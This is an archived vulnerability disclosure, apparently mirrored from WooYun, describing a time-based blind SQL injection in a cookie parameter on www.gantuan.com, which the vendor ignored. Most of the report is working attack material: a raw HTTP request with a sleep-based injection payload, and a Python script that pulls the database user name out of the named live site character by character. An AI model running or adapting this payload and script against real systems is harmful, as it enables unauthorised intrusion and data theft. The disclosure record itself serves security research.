乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开
GET /team/ask.php HTTP/1.1Cookie: PHPSESSID=1824f59adfd9f7ca60ecaa80da7f5575; 1cf6_city='XOR(if(now()=sysdate(),sleep(if(length(user())=17,3,0)),0))OR';X-Requested-With: XMLHttpRequestReferer: http://www.gantuan.comHost: www.gantuan.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
Cookie中的1cf6_city参数存在注入
user的长度为17~
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive user:'user = ''for i in range(1,18): for payload in payloads: try: conn = httplib.HTTPConnection('www.gantuan.com', timeout=10) headers['Cookie']="PHPSESSID=1824f59adfd9f7ca60ecaa80da7f5575;1cf6_city='XOR(if(now()=sysdate(),sleep(if(ascii(mid(user(),%s,1))=%s,10,0)),0))OR';" % (i, ord(payload)) conn.request(method='GET', url= '/team/ask.php' , headers = headers) html_doc = conn.getresponse().read() conn.close() print '.', except Exception, e: user += payload print '\nIn progress]', user break print '\n[Done] User is:', user
危害等级:无影响厂商忽略
忽略时间:2015-12-19 11:14
漏洞Rank:4 (WooYun评价)
暂无